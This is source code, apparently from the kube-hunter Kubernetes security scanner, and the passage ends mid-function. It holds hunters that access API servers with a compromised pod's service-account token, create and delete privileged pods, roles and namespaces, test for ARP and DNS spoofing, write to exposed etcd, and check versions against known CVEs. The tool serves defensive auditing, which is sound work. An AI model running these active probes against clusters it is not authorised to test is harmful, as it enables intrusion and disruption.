""" Deleting a role might allow an attacker to affect access to resources in the namespace"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted a role",
category=AccessRisk,
)
self.evidence = evidence
class DeleteAClusterRole(Vulnerability, Event):
""" Deleting a cluster role might allow an attacker to affect access to resources in the cluster"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted a cluster role",
category=AccessRisk,
)
self.evidence = evidence
class CreateAPod(Vulnerability, Event):
""" Creating a new pod allows an attacker to run custom code"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created A Pod",
category=AccessRisk,
)
self.evidence = evidence
class CreateAPrivilegedPod(Vulnerability, Event):
""" Creating a new PRIVILEGED pod would gain an attacker FULL CONTROL over the cluster"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Created A PRIVILEGED Pod",
category=AccessRisk,
)
self.evidence = evidence
class PatchAPod(Vulnerability, Event):
""" Patching a pod allows an attacker to compromise and control it """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Patched A Pod",
category=AccessRisk,
)
self.evidence = evidence
class DeleteAPod(Vulnerability, Event):
""" Deleting a pod allows an attacker to disturb applications on the cluster """
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Deleted A Pod",
category=AccessRisk,
)
self.evidence = evidence
class ApiServerPassiveHunterFinished(Event):
def __init__(self, namespaces):
self.namespaces = namespaces
# This Hunter checks what happens if we try to access the API Server without a service account token
# If we have a service account token we'll also trigger AccessApiServerWithToken below
@handler.subscribe(ApiServer)
class AccessApiServer(Hunter):
"""API Server Hunter
Checks if API server is accessible
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
self.headers = {}
self.with_token = False
def access_api_server(self):
config = get_config()
logger.debug(f"Passive Hunter is attempting to access the API at {self.path}")
try:
r = requests.get(f"{self.path}/api", headers=self.headers, verify=False, timeout=config.network_timeout)
if r.status_code == 200 and r.content:
return r.content
except requests.exceptions.ConnectionError:
pass
return False
def get_items(self, path):
config = get_config()
try:
items = []
r = requests.get(path, headers=self.headers, verify=False, timeout=config.network_timeout)
if r.status_code == 200:
resp = json.loads(r.content)
for item in resp["items"]:
items.append(item["metadata"]["name"])
return items
logger.debug(f"Got HTTP {r.status_code} respone: {r.text}")
except (requests.exceptions.ConnectionError, KeyError):
logger.debug(f"Failed retrieving items from API server at {path}")
return None
def get_pods(self, namespace=None):
config = get_config()
pods = []
try:
if not namespace:
r = requests.get(
f"{self.path}/api/v1/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
else:
r = requests.get(
f"{self.path}/api/v1/namespaces/{namespace}/pods",
headers=self.headers,
verify=False,
timeout=config.network_timeout,
)
if r.status_code == 200:
resp = json.loads(r.content)
for item in resp["items"]:
name = item["metadata"]["name"].encode("ascii", "ignore")
namespace = item["metadata"]["namespace"].encode("ascii", "ignore")
pods.append({"name": name, "namespace": namespace})
return pods
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def execute(self):
api = self.access_api_server()
if api:
if self.event.protocol == "http":
self.publish_event(ServerApiHTTPAccess(api))
else:
self.publish_event(ServerApiAccess(api, self.with_token))
namespaces = self.get_items(f"{self.path}/api/v1/namespaces")
if namespaces:
self.publish_event(ListNamespaces(namespaces, self.with_token))
roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/roles")
if roles:
self.publish_event(ListRoles(roles, self.with_token))
cluster_roles = self.get_items(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles")
if cluster_roles:
self.publish_event(ListClusterRoles(cluster_roles, self.with_token))
pods = self.get_pods()
if pods:
self.publish_event(ListPodsAndNamespaces(pods, self.with_token))
# If we have a service account token, this event should get triggered twice - once with and once without
# the token
self.publish_event(ApiServerPassiveHunterFinished(namespaces))
@handler.subscribe(ApiServer, predicate=lambda x: x.auth_token)
class AccessApiServerWithToken(AccessApiServer):
"""API Server Hunter
Accessing the API server using the service account token obtained from a compromised pod
"""
def __init__(self, event):
super().__init__(event)
assert self.event.auth_token
self.headers = {"Authorization": f"Bearer {self.event.auth_token}"}
self.category = InformationDisclosure
self.with_token = True
# Active Hunter
@handler.subscribe(ApiServerPassiveHunterFinished)
class AccessApiServerActive(ActiveHunter):
"""API server hunter
Accessing the api server might grant an attacker full control over the cluster
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
def create_item(self, path, data):
config = get_config()
headers = {"Content-Type": "application/json"}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.post(path, verify=False, data=data, headers=headers, timeout=config.network_timeout)
if res.status_code in [200, 201, 202]:
parsed_content = json.loads(res.content)
return parsed_content["metadata"]["name"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def patch_item(self, path, data):
config = get_config()
headers = {"Content-Type": "application/json-patch+json"}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.patch(path, headers=headers, verify=False, data=data, timeout=config.network_timeout)
if res.status_code not in [200, 201, 202]:
return None
parsed_content = json.loads(res.content)
# TODO is there a patch timestamp we could use?
return parsed_content["metadata"]["namespace"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def delete_item(self, path):
config = get_config()
headers = {}
if self.event.auth_token:
headers["Authorization"] = f"Bearer {self.event.auth_token}"
try:
res = requests.delete(path, headers=headers, verify=False, timeout=config.network_timeout)
if res.status_code in [200, 201, 202]:
parsed_content = json.loads(res.content)
return parsed_content["metadata"]["deletionTimestamp"]
except (requests.exceptions.ConnectionError, KeyError):
pass
return None
def create_a_pod(self, namespace, is_privileged):
privileged_value = {"securityContext": {"privileged": True}} if is_privileged else {}
random_name = str(uuid.uuid4())[0:5]
pod = {
"apiVersion": "v1",
"kind": "Pod",
"metadata": {"name": random_name},
"spec": {
"containers": [
{"name": random_name, "image": "nginx:1.7.9", "ports": [{"containerPort": 80}], **privileged_value}
]
},
}
return self.create_item(path=f"{self.path}/api/v1/namespaces/{namespace}/pods", data=json.dumps(pod))
def delete_a_pod(self, namespace, pod_name):
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}")
if not delete_timestamp:
logger.error(f"Created pod {pod_name} in namespace {namespace} but unable to delete it")
return delete_timestamp
def patch_a_pod(self, namespace, pod_name):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/api/v1/namespaces/{namespace}/pods/{pod_name}",
data=json.dumps(data),
)
def create_namespace(self):
random_name = (str(uuid.uuid4()))[0:5]
data = {
"kind": "Namespace",
"apiVersion": "v1",
"metadata": {"name": random_name, "labels": {"name": random_name}},
}
return self.create_item(path=f"{self.path}/api/v1/namespaces", data=json.dumps(data))
def delete_namespace(self, namespace):
delete_timestamp = self.delete_item(f"{self.path}/api/v1/namespaces/{namespace}")
if delete_timestamp is None:
logger.error(f"Created namespace {namespace} but failed to delete it")
return delete_timestamp
def create_a_role(self, namespace):
name = str(uuid.uuid4())[0:5]
role = {
"kind": "Role",
"apiVersion": "rbac.authorization.k8s.io/v1",
"metadata": {"namespace": namespace, "name": name},
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
}
return self.create_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles",
data=json.dumps(role),
)
def create_a_cluster_role(self):
name = str(uuid.uuid4())[0:5]
cluster_role = {
"kind": "ClusterRole",
"apiVersion": "rbac.authorization.k8s.io/v1",
"metadata": {"name": name},
"rules": [{"apiGroups": [""], "resources": ["pods"], "verbs": ["get", "watch", "list"]}],
}
return self.create_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles",
data=json.dumps(cluster_role),
)
def delete_a_role(self, namespace, name):
delete_timestamp = self.delete_item(
f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles/{name}"
)
if delete_timestamp is None:
logger.error(f"Created role {name} in namespace {namespace} but unable to delete it")
return delete_timestamp
def delete_a_cluster_role(self, name):
delete_timestamp = self.delete_item(f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{name}")
if delete_timestamp is None:
logger.error(f"Created cluster role {name} but unable to delete it")
return delete_timestamp
def patch_a_role(self, namespace, role):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/namespaces/{namespace}/roles/{role}",
data=json.dumps(data),
)
def patch_a_cluster_role(self, cluster_role):
data = [{"op": "add", "path": "/hello", "value": ["world"]}]
return self.patch_item(
path=f"{self.path}/apis/rbac.authorization.k8s.io/v1/clusterroles/{cluster_role}",
data=json.dumps(data),
)
def execute(self):
# Try creating cluster-wide objects
namespace = self.create_namespace()
if namespace:
self.publish_event(CreateANamespace(f"new namespace name: {namespace}"))
delete_timestamp = self.delete_namespace(namespace)
if delete_timestamp:
self.publish_event(DeleteANamespace(delete_timestamp))
cluster_role = self.create_a_cluster_role()
if cluster_role:
self.publish_event(CreateAClusterRole(f"Cluster role name: {cluster_role}"))
patch_evidence = self.patch_a_cluster_role(cluster_role)
if patch_evidence:
self.publish_event(
PatchAClusterRole(f"Patched Cluster Role Name: {cluster_role} Patch evidence: {patch_evidence}")
)
delete_timestamp = self.delete_a_cluster_role(cluster_role)
if delete_timestamp:
self.publish_event(DeleteAClusterRole(f"Cluster role {cluster_role} deletion time {delete_timestamp}"))
# Try attacking all the namespaces we know about
if self.event.namespaces:
for namespace in self.event.namespaces:
# Try creating and deleting a privileged pod
pod_name = self.create_a_pod(namespace, True)
if pod_name:
self.publish_event(CreateAPrivilegedPod(f"Pod Name: {pod_name} Namespace: {namespace}"))
delete_time = self.delete_a_pod(namespace, pod_name)
if delete_time:
self.publish_event(DeleteAPod(f"Pod Name: {pod_name} Deletion time: {delete_time}"))
# Try creating, patching and deleting an unprivileged pod
pod_name = self.create_a_pod(namespace, False)
if pod_name:
self.publish_event(CreateAPod(f"Pod Name: {pod_name} Namespace: {namespace}"))
patch_evidence = self.patch_a_pod(namespace, pod_name)
if patch_evidence:
self.publish_event(
PatchAPod(
f"Pod Name: {pod_name} " f"Namespace: {namespace} " f"Patch evidence: {patch_evidence}"
)
)
delete_time = self.delete_a_pod(namespace, pod_name)
if delete_time:
self.publish_event(
DeleteAPod(
f"Pod Name: {pod_name} " f"Namespace: {namespace} " f"Delete time: {delete_time}"
)
)
role = self.create_a_role(namespace)
if role:
self.publish_event(CreateARole(f"Role name: {role}"))
patch_evidence = self.patch_a_role(namespace, role)
if patch_evidence:
self.publish_event(
PatchARole(
f"Patched Role Name: {role} "
f"Namespace: {namespace} "
f"Patch evidence: {patch_evidence}"
)
)
delete_time = self.delete_a_role(namespace, role)
if delete_time:
self.publish_event(
DeleteARole(
f"Deleted role: {role} " f"Namespace: {namespace} " f"Delete time: {delete_time}"
)
)
# Note: we are not binding any role or cluster role because
# in certain cases it might effect the running pod within the cluster (and we don't want to do that).
@handler.subscribe(ApiServer)
class ApiVersionHunter(Hunter):
"""Api Version Hunter
Tries to obtain the Api Server's version directly from /version endpoint
"""
def __init__(self, event):
self.event = event
self.path = f"{self.event.protocol}://{self.event.host}:{self.event.port}"
self.session = requests.Session()
self.session.verify = False
if self.event.auth_token:
self.session.headers.update({"Authorization": f"Bearer {self.event.auth_token}"})
def execute(self):
config = get_config()
if self.event.auth_token:
logger.debug(
"Trying to access the API server version endpoint using pod's"
f" service account token on {self.event.host}:{self.event.port} \t"
)
else:
logger.debug("Trying to access the API server version endpoint anonymously")
version = self.session.get(f"{self.path}/version", timeout=config.network_timeout).json()["gitVersion"]
logger.debug(f"Discovered version of api server {version}")
self.publish_event(K8sVersionDisclosure(version=version, from_endpoint="/version"))

View File

@@ -0,0 +1,71 @@
import logging
from scapy.all import ARP, IP, ICMP, Ether, sr1, srp
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import ActiveHunter, KubernetesCluster, IdentityTheft
from kube_hunter.modules.hunting.capabilities import CapNetRawEnabled
logger = logging.getLogger(__name__)
class PossibleArpSpoofing(Vulnerability, Event):
"""A malicious pod running on the cluster could potentially run an ARP Spoof attack
and perform a MITM between pods on the node."""
def __init__(self):
Vulnerability.__init__(
self,
KubernetesCluster,
"Possible Arp Spoof",
category=IdentityTheft,
vid="KHV020",
)
@handler.subscribe(CapNetRawEnabled)
class ArpSpoofHunter(ActiveHunter):
"""Arp Spoof Hunter
Checks for the possibility of running an ARP spoof
attack from within a pod (results are based on the running node)
"""
def __init__(self, event):
self.event = event
def try_getting_mac(self, ip):
config = get_config()
ans = sr1(ARP(op=1, pdst=ip), timeout=config.network_timeout, verbose=0)
return ans[ARP].hwsrc if ans else None
def detect_l3_on_host(self, arp_responses):
""" returns True for an existence of an L3 network plugin """
logger.debug("Attempting to detect L3 network plugin using ARP")
unique_macs = list({response[ARP].hwsrc for _, response in arp_responses})
# if LAN addresses not unique
if len(unique_macs) == 1:
# if an ip outside the subnets gets a mac address
outside_mac = self.try_getting_mac("1.1.1.1")
# outside mac is the same as lan macs
if outside_mac == unique_macs[0]:
return True
# only one mac address for whole LAN and outside
return False
def execute(self):
config = get_config()
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"),
timeout=config.network_timeout,
verbose=0,
)
# arp enabled on cluster and more than one pod on node
if len(arp_responses) > 1:
# L3 plugin not installed
if not self.detect_l3_on_host(arp_responses):
self.publish_event(PossibleArpSpoofing())

View File

@@ -0,0 +1,49 @@
import socket
import logging
from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import Hunter, AccessRisk, KubernetesCluster
logger = logging.getLogger(__name__)
class CapNetRawEnabled(Event, Vulnerability):
"""CAP_NET_RAW is enabled by default for pods.
If an attacker manages to compromise a pod,
they could potentially take advantage of this capability to perform network
attacks on other pods running on the same node"""
def __init__(self):
Vulnerability.__init__(
self,
KubernetesCluster,
name="CAP_NET_RAW Enabled",
category=AccessRisk,
)
@handler.subscribe(RunningAsPodEvent)
class PodCapabilitiesHunter(Hunter):
"""Pod Capabilities Hunter
Checks for default enabled capabilities in a pod
"""
def __init__(self, event):
self.event = event
def check_net_raw(self):
logger.debug("Passive hunter's trying to open a RAW socket")
try:
# trying to open a raw socket without CAP_NET_RAW will raise PermissionsError
s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
s.close()
logger.debug("Passive hunter's closing RAW socket")
return True
except PermissionError:
logger.debug("CAP_NET_RAW not enabled")
def execute(self):
if self.check_net_raw():
self.publish_event(CapNetRawEnabled())

View File

@@ -0,0 +1,55 @@
import ssl
import logging
import base64
import re
from kube_hunter.core.types import Hunter, KubernetesCluster, InformationDisclosure
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, Service
logger = logging.getLogger(__name__)
email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")
class CertificateEmail(Vulnerability, Event):
"""The Kubernetes API Server advertises a public certificate for TLS.
This certificate includes an email address, that may provide additional information for an attacker on your
organization, or be abused for further email based attacks."""
def __init__(self, email):
Vulnerability.__init__(
self,
KubernetesCluster,
"Certificate Includes Email Address",
category=InformationDisclosure,
vid="KHV021",
)
self.email = email
self.evidence = f"email: {self.email}"
@handler.subscribe(Service)
class CertificateDiscovery(Hunter):
"""Certificate Email Hunting
Checks for email addresses in kubernetes ssl certificates
"""
def __init__(self, event):
self.event = event
def execute(self):
try:
logger.debug("Passive hunter is attempting to get server certificate")
addr = (str(self.event.host), self.event.port)
cert = ssl.get_server_certificate(addr)
except ssl.SSLError:
# If the server doesn't offer SSL on this port we won't get a certificate
return
self.examine_certificate(cert)
def examine_certificate(self, cert):
c = cert.strip(ssl.PEM_HEADER).strip("\n").strip(ssl.PEM_FOOTER).strip("\n")
certdata = base64.b64decode(c)
emails = re.findall(email_pattern, certdata)
for email in emails:
self.publish_event(CertificateEmail(email=email))

View File

@@ -0,0 +1,245 @@
import logging
from packaging import version
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, K8sVersionDisclosure
from kube_hunter.core.types import (
Hunter,
KubernetesCluster,
RemoteCodeExec,
PrivilegeEscalation,
DenialOfService,
KubectlClient,
)
from kube_hunter.modules.discovery.kubectl import KubectlClientEvent
logger = logging.getLogger(__name__)
class ServerApiVersionEndPointAccessPE(Vulnerability, Event):
"""Node is vulnerable to critical CVE-2018-1002105"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Critical Privilege Escalation CVE",
category=PrivilegeEscalation,
vid="KHV022",
)
self.evidence = evidence
class ServerApiVersionEndPointAccessDos(Vulnerability, Event):
"""Node not patched for CVE-2019-1002100. Depending on your RBAC settings,
a crafted json-patch could cause a Denial of Service."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Denial of Service to Kubernetes API Server",
category=DenialOfService,
vid="KHV023",
)
self.evidence = evidence
class PingFloodHttp2Implementation(Vulnerability, Event):
"""Node not patched for CVE-2019-9512. an attacker could cause a
Denial of Service by sending specially crafted HTTP requests."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Possible Ping Flood Attack",
category=DenialOfService,
vid="KHV024",
)
self.evidence = evidence
class ResetFloodHttp2Implementation(Vulnerability, Event):
"""Node not patched for CVE-2019-9514. an attacker could cause a
Denial of Service by sending specially crafted HTTP requests."""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Possible Reset Flood Attack",
category=DenialOfService,
vid="KHV025",
)
self.evidence = evidence
class ServerApiClusterScopedResourcesAccess(Vulnerability, Event):
"""Api Server not patched for CVE-2019-11247.
API server allows access to custom resources via wrong scope"""
def __init__(self, evidence):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Arbitrary Access To Cluster Scoped Resources",
category=PrivilegeEscalation,
vid="KHV026",
)
self.evidence = evidence
class IncompleteFixToKubectlCpVulnerability(Vulnerability, Event):
"""The kubectl client is vulnerable to CVE-2019-11246,
an attacker could potentially execute arbitrary code on the client's machine"""
def __init__(self, binary_version):
Vulnerability.__init__(
self,
KubectlClient,
"Kubectl Vulnerable To CVE-2019-11246",
category=RemoteCodeExec,
vid="KHV027",
)
self.binary_version = binary_version
self.evidence = f"kubectl version: {self.binary_version}"
class KubectlCpVulnerability(Vulnerability, Event):
"""The kubectl client is vulnerable to CVE-2019-1002101,
an attacker could potentially execute arbitrary code on the client's machine"""
def __init__(self, binary_version):
Vulnerability.__init__(
self,
KubectlClient,
"Kubectl Vulnerable To CVE-2019-1002101",
category=RemoteCodeExec,
vid="KHV028",
)
self.binary_version = binary_version
self.evidence = f"kubectl version: {self.binary_version}"
class CveUtils:
@staticmethod
def get_base_release(full_ver):
# if LegacyVersion, converting manually to a base version
if isinstance(full_ver, version.LegacyVersion):
return version.parse(".".join(full_ver._version.split(".")[:2]))
return version.parse(".".join(map(str, full_ver._version.release[:2])))
@staticmethod
def to_legacy(full_ver):
# converting version to version.LegacyVersion
return version.LegacyVersion(".".join(map(str, full_ver._version.release)))
@staticmethod
def to_raw_version(v):
if not isinstance(v, version.LegacyVersion):
return ".".join(map(str, v._version.release))
return v._version
@staticmethod
def version_compare(v1, v2):
"""Function compares two versions, handling differences with conversion to LegacyVersion"""
# getting raw version, while striping 'v' char at the start. if exists.
# removing this char lets us safely compare the two version.
v1_raw = CveUtils.to_raw_version(v1).strip("v")
v2_raw = CveUtils.to_raw_version(v2).strip("v")
new_v1 = version.LegacyVersion(v1_raw)
new_v2 = version.LegacyVersion(v2_raw)
return CveUtils.basic_compare(new_v1, new_v2)
@staticmethod
def basic_compare(v1, v2):
return (v1 > v2) - (v1 < v2)
@staticmethod
def is_downstream_version(version):
return any(c in version for c in "+-~")
@staticmethod
def is_vulnerable(fix_versions, check_version, ignore_downstream=False):
"""Function determines if a version is vulnerable,
by comparing to given fix versions by base release"""
if ignore_downstream and CveUtils.is_downstream_version(check_version):
return False
vulnerable = False
check_v = version.parse(check_version)
base_check_v = CveUtils.get_base_release(check_v)
# default to classic compare, unless the check_version is legacy.
version_compare_func = CveUtils.basic_compare
if isinstance(check_v, version.LegacyVersion):
version_compare_func = CveUtils.version_compare
if check_version not in fix_versions:
# comparing ease base release for a fix
for fix_v in fix_versions:
fix_v = version.parse(fix_v)
base_fix_v = CveUtils.get_base_release(fix_v)
# if the check version and the current fix has the same base release
if base_check_v == base_fix_v:
# when check_version is legacy, we use a custom compare func, to handle differences between versions
if version_compare_func(check_v, fix_v) == -1:
# determine vulnerable if smaller and with same base version
vulnerable = True
break
# if we did't find a fix in the fix releases, checking if the version is smaller that the first fix
if not vulnerable and version_compare_func(check_v, version.parse(fix_versions[0])) == -1:
vulnerable = True
return vulnerable
@handler.subscribe_once(K8sVersionDisclosure)
class K8sClusterCveHunter(Hunter):
"""K8s CVE Hunter
Checks if Node is running a Kubernetes version vulnerable to
specific important CVEs
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
logger.debug(f"Checking known CVEs for k8s API version: {self.event.version}")
cve_mapping = {
ServerApiVersionEndPointAccessPE: ["1.10.11", "1.11.5", "1.12.3"],
ServerApiVersionEndPointAccessDos: ["1.11.8", "1.12.6", "1.13.4"],
ResetFloodHttp2Implementation: ["1.13.10", "1.14.6", "1.15.3"],
PingFloodHttp2Implementation: ["1.13.10", "1.14.6", "1.15.3"],
ServerApiClusterScopedResourcesAccess: ["1.13.9", "1.14.5", "1.15.2"],
}
for vulnerability, fix_versions in cve_mapping.items():
if CveUtils.is_vulnerable(fix_versions, self.event.version, not config.include_patched_versions):
self.publish_event(vulnerability(self.event.version))
@handler.subscribe(KubectlClientEvent)
class KubectlCVEHunter(Hunter):
"""Kubectl CVE Hunter
Checks if the kubectl client is vulnerable to specific important CVEs
"""
def __init__(self, event):
self.event = event
def execute(self):
config = get_config()
cve_mapping = {
KubectlCpVulnerability: ["1.11.9", "1.12.7", "1.13.5", "1.14.0"],
IncompleteFixToKubectlCpVulnerability: ["1.12.9", "1.13.6", "1.14.2"],
}
logger.debug(f"Checking known CVEs for kubectl version: {self.event.version}")
for vulnerability, fix_versions in cve_mapping.items():
if CveUtils.is_vulnerable(fix_versions, self.event.version, not config.include_patched_versions):
self.publish_event(vulnerability(binary_version=self.event.version))

View File

@@ -0,0 +1,45 @@
import logging
import json
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.types import Hunter, RemoteCodeExec, KubernetesCluster
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event
from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
logger = logging.getLogger(__name__)
class DashboardExposed(Vulnerability, Event):
"""All operations on the cluster are exposed"""
def __init__(self, nodes):
Vulnerability.__init__(
self,
KubernetesCluster,
"Dashboard Exposed",
category=RemoteCodeExec,
vid="KHV029",
)
self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None
@handler.subscribe(KubeDashboardEvent)
class KubeDashboard(Hunter):
"""Dashboard Hunting
Hunts open Dashboards, gets the type of nodes in the cluster
"""
def __init__(self, event):
self.event = event
def get_nodes(self):
config = get_config()
logger.debug("Passive hunter is attempting to get nodes types of the cluster")
r = requests.get(f"http://{self.event.host}:{self.event.port}/api/v1/node", timeout=config.network_timeout)
if r.status_code == 200 and "nodes" in r.text:
return [node["objectMeta"]["name"] for node in json.loads(r.text)["nodes"]]
def execute(self):
self.publish_event(DashboardExposed(nodes=self.get_nodes()))

View File

@@ -0,0 +1,90 @@
import re
import logging
from scapy.all import IP, ICMP, UDP, DNS, DNSQR, ARP, Ether, sr1, srp1, srp
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Event, Vulnerability
from kube_hunter.core.types import ActiveHunter, KubernetesCluster, IdentityTheft
from kube_hunter.modules.hunting.arp import PossibleArpSpoofing
logger = logging.getLogger(__name__)
class PossibleDnsSpoofing(Vulnerability, Event):
"""A malicious pod running on the cluster could potentially run a DNS Spoof attack
and perform a MITM attack on applications running in the cluster."""
def __init__(self, kubedns_pod_ip):
Vulnerability.__init__(
self,
KubernetesCluster,
"Possible DNS Spoof",
category=IdentityTheft,
vid="KHV030",
)
self.kubedns_pod_ip = kubedns_pod_ip
self.evidence = f"kube-dns at: {self.kubedns_pod_ip}"
# Only triggered with RunningAsPod base event
@handler.subscribe(PossibleArpSpoofing)
class DnsSpoofHunter(ActiveHunter):
"""DNS Spoof Hunter
Checks for the possibility for a malicious pod to compromise DNS requests of the cluster
(results are based on the running node)
"""
def __init__(self, event):
self.event = event
def get_cbr0_ip_mac(self):
config = get_config()
res = srp1(Ether() / IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)
return res[IP].src, res.src
def extract_nameserver_ip(self):
with open("/etc/resolv.conf") as f:
# finds first nameserver in /etc/resolv.conf
match = re.search(r"nameserver (\d+.\d+.\d+.\d+)", f.read())
if match:
return match.group(1)
def get_kube_dns_ip_mac(self):
config = get_config()
kubedns_svc_ip = self.extract_nameserver_ip()
# getting actual pod ip of kube-dns service, by comparing the src mac of a dns response and arp scanning.
dns_info_res = srp1(
Ether() / IP(dst=kubedns_svc_ip) / UDP(dport=53) / DNS(rd=1, qd=DNSQR()),
verbose=0,
timeout=config.network_timeout,
)
kubedns_pod_mac = dns_info_res.src
self_ip = dns_info_res[IP].dst
arp_responses, _ = srp(
Ether(dst="ff:ff:ff:ff:ff:ff") / ARP(op=1, pdst=f"{self_ip}/24"),
timeout=config.network_timeout,
verbose=0,
)
for _, response in arp_responses:
if response[Ether].src == kubedns_pod_mac:
return response[ARP].psrc, response.src
def execute(self):
config = get_config()
logger.debug("Attempting to get kube-dns pod ip")
self_ip = sr1(IP(dst="1.1.1.1", ttl=1) / ICMP(), verbose=0, timeout=config.network_timeout)[IP].dst
cbr0_ip, cbr0_mac = self.get_cbr0_ip_mac()
kubedns = self.get_kube_dns_ip_mac()
if kubedns:
kubedns_ip, kubedns_mac = kubedns
logger.debug(f"ip={self_ip} kubednsip={kubedns_ip} cbr0ip={cbr0_ip}")
if kubedns_mac != cbr0_mac:
# if self pod in the same subnet as kube-dns pod
self.publish_event(PossibleDnsSpoofing(kubedns_pod_ip=kubedns_ip))
else:
logger.debug("Could not get kubedns identity")

View File

@@ -0,0 +1,176 @@
import logging
import requests
from kube_hunter.conf import get_config
from kube_hunter.core.events import handler
from kube_hunter.core.events.types import Vulnerability, Event, OpenPortEvent
from kube_hunter.core.types import (
ActiveHunter,
Hunter,
KubernetesCluster,
InformationDisclosure,
RemoteCodeExec,
UnauthenticatedAccess,
AccessRisk,
)
logger = logging.getLogger(__name__)
ETCD_PORT = 2379
""" Vulnerabilities """
class EtcdRemoteWriteAccessEvent(Vulnerability, Event):
"""Remote write access might grant an attacker full control over the kubernetes cluster"""
def __init__(self, write_res):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Etcd Remote Write Access Event",
category=RemoteCodeExec,
vid="KHV031",
)
self.evidence = write_res
class EtcdRemoteReadAccessEvent(Vulnerability, Event):
"""Remote read access might expose to an attacker cluster's possible exploits, secrets and more."""
def __init__(self, keys):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Etcd Remote Read Access Event",
category=AccessRisk,
vid="KHV032",
)
self.evidence = keys
class EtcdRemoteVersionDisclosureEvent(Vulnerability, Event):
"""Remote version disclosure might give an attacker a valuable data to attack a cluster"""
def __init__(self, version):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Etcd Remote version disclosure",
category=InformationDisclosure,
vid="KHV033",
)
self.evidence = version
class EtcdAccessEnabledWithoutAuthEvent(Vulnerability, Event):
"""Etcd is accessible using HTTP (without authorization and authentication),
it would allow a potential attacker to
gain access to the etcd"""
def __init__(self, version):
Vulnerability.__init__(
self,
KubernetesCluster,
name="Etcd is accessible using insecure connection (HTTP)",
category=UnauthenticatedAccess,
vid="KHV034",
)
self.evidence = version
# Active Hunter
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
class EtcdRemoteAccessActive(ActiveHunter):
"""Etcd Remote Access
Checks for remote write access to etcd, will attempt to add a new key to the etcd DB"""
def __init__(self, event):
self.event = event
self.write_evidence = ""
self.event.protocol = "https"
def db_keys_write_access(self):
config = get_config()
logger.debug(f"Trying to write keys remotely on host {self.event.host}")
data = {"value": "remotely written data"}
try:
r = requests.post(
f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
data=data,
timeout=config.network_timeout,
)
self.write_evidence = r.content if r.status_code == 200 and r.content else False
return self.write_evidence
except requests.exceptions.ConnectionError:
return False
def execute(self):
if self.db_keys_write_access():
self.publish_event(EtcdRemoteWriteAccessEvent(self.write_evidence))
# Passive Hunter
@handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
class EtcdRemoteAccess(Hunter):
"""Etcd Remote Access
Checks for remote availability of etcd, its version, and read access to the DB
"""
def __init__(self, event):
self.event = event
self.version_evidence = ""
self.keys_evidence = ""
self.event.protocol = "https"
def db_keys_disclosure(self):
config = get_config()
